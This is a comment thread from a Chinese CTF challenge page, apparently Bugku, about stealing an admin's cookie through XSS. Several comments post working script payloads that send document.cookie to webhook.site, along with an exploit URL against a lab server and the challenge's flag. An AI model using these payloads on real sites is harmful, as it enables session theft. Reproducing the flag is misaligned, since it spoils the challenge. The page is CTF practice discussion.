评分(0)
暂无评分
解题动态

czg9000 攻破了该题 22小时前

iictfii 攻破了该题 1天前

A1234467 攻破了该题 2天前

excnir 攻破了该题 19天前

dir_tree 攻破了该题 1月前

coldplay99999 攻破了该题 1月前

Jokerz 攻破了该题 1月前

blackkkkkk 攻破了该题 1月前

zzhicecyb 攻破了该题 1月前

whileangel 攻破了该题 1月前

montarius 攻破了该题 2月前

Enochlllyyynnn 攻破了该题 2月前

用户1119 攻破了该题 2月前

ZCTY 攻破了该题 2月前

BugkuUser1 攻破了该题 2月前

t1tl3d 攻破了该题 2月前

黑客小贺 攻破了该题 2月前

n0th1n9 攻破了该题 2月前

sraiL 攻破了该题 2月前

评论
倦鸟叫了一整天 2月前
举报
看不到源码呀
15756309355 6月前
举报
斯,为什么我服务器接受不到cookie的请求,网站根本没有访问我服务器
yearling 5月前
举报
我也拿不到cookie,难绷
missa 6月前
举报
请问有什么推荐的xss平台吗?网上找的没有用,自己本机去访问都收不到信息,
vincentshine 3月前
举报
任何一个带外网站都可以,推荐ceye
一只小羊 8月前
举报
<script>fetch('https://webhook.site/aa6a0e67-0dcc-4c44-94cd-ec7c8960b235',{method:'POST',body:document.cookie})</script>
vincentshine 3月前
举报
感谢老哥的脚本,我用其他的windows.location.href的方式打不开
1512624649 10月前
举报
flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252
.⎛⎝•̀ω•́⎠⎞. 12月前
举报
典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个
meilanzhuju 1年前
举报
有点晕乎
qingfeng1115 1年前
举报
<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a
yituoshi 1年前
举报
Half the truth is often a big lie: "flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08
justsosoloveyou 1年前
举报
第一个框反射xss,第二个框存储xss。将第一个框触发xss的url输入到第二个框,后台自动访问url后即可触发xss盗取cookie里的flag。注意需要将js编码。
lltong 11月前
举报
将js编码,是怎么编码呢